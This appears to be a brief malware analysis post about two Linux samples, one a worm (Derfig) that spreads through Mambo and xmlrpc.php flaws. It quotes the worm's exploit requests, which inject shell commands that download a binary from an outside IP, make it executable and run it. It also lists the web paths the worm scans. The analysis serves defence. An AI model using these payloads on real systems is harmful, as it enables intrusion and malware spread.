Skip navigation.
Home

New Linux Malware

Two linux malware in zip.

session: infected: Backdoor.Linux.Keitan.c

derfig: infected: Net-Worm.Linux.Mare.e

lys.

Derfig

The Derfig binary seems to spread via a Mambo and a xmlrpc.php vulns.

Mambo exploit from bin:
/index2.php?option=com_content&do_pdf=1&id=1
GET %sindex2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%%20/tmp;wget%%20209.123.16.34/gicumz;chmod%%20744%%20gicumz;./gicumz;echo%%20YYY;echo| HTTP/1.1

xmlrpc.php vuln:
POST %s HTTP/1.1
Host: %s
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length:269
test.method',''));echo '_begin_';echo `cd /tmp;wget 209.123.16.34/gicumz;chmod +x gicumz;./gicumz `;echo '_end_';exit;/*

it looks for these vulns in the following locations:
/cvs/
/articles/mambo/
/cvs/mambo/
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc/xmlrpc.php

Both of these binaries seem to have been built on Redhat 9 systems (from the compiler version strings).